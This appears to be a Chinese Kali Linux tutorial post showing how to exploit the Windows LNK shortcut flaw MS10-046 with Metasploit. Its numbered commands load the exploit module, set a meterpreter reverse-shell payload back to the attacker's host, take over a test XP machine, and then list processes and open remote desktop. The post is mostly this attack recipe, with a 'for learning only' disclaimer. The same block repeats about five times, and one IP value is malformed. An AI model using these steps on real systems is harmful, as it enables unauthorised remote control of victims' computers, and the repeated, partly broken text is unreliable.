'Kali Linux實戰篇:MSF框架利用MS10-046漏洞實現遠程控制計算機'
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 複製這個地址 去另一臺XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 複製這個地址 去另一臺XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
然後我們在來到MSF終端看見漏洞執行成功了 有一個連接會話 ID 1
命令 :
sessions -l 查看存在的會話
sessions -i 1 選著會話1
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 複製這個地址 去另一臺XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
然後我們在來到MSF終端看見漏洞執行成功了 有一個連接會話 ID 1
命令 :
sessions -l 查看存在的會話
sessions -i 1 選著會話1
AD:歡迎在以下專欄,學習完整Kali Linux滲透測試實戰課程!
輸入ps命令查看進程 或者 輸入run vnc 查看遠程桌面 等等
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 複製這個地址 去另一臺XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
然後我們在來到MSF終端看見漏洞執行成功了 有一個連接會話 ID 1
命令 :
sessions -l 查看存在的會話
sessions -i 1 選著會話1
AD:歡迎在以下專欄,學習完整Kali Linux滲透測試實戰課程!
輸入ps命令查看進程 或者 輸入run vnc 查看遠程桌面 等等
聲明:本頭條號【Kali技術】所有分享,僅限學習交流!請勿他用!
這次用到MS10-046這個遠程執行漏洞(Windows快捷方式LNK文件自動執行代碼漏洞攻擊)
可在微軟官網瞭解此漏洞危害,附上鍊接:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2010/ms10-046
命令:
1. msfconsole //啟動MSF Metasploit
2. search ms10-046 //搜索漏洞
3. use windows/browser/ms10_046_shortcut_icon_dllloader //加載漏洞模塊
4. set payload windows/meterpreter/reverse_tcp //設置一個PAYLOAD為反彈連接shell
5. show options //查看相關設置
6. set SRVHOST 192.168.1.10 //設置攻擊者自身IP
7. set LHOST 192.168.10 //設置反彈連接回來的IP (攻擊者自身IP)
8. exploit //開始執行漏洞...
會生成一個URL連接 複製這個地址 去另一臺XP系統機器上測試 用瀏覽器打開會跳到共享文件夾下
然後我們在來到MSF終端看見漏洞執行成功了 有一個連接會話 ID 1
命令 :
sessions -l 查看存在的會話
sessions -i 1 選著會話1
AD:歡迎在以下專欄,學習完整Kali Linux滲透測試實戰課程!
輸入ps命令查看進程 或者 輸入run vnc 查看遠程桌面 等等